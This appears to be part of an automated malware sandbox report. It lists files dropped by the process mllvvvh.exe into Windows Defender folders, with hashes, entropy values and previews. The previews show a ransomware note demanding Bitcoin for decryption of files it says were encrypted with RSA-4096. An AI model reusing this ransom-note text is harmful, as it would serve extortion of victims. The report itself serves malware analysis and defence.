                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Support\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Support\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
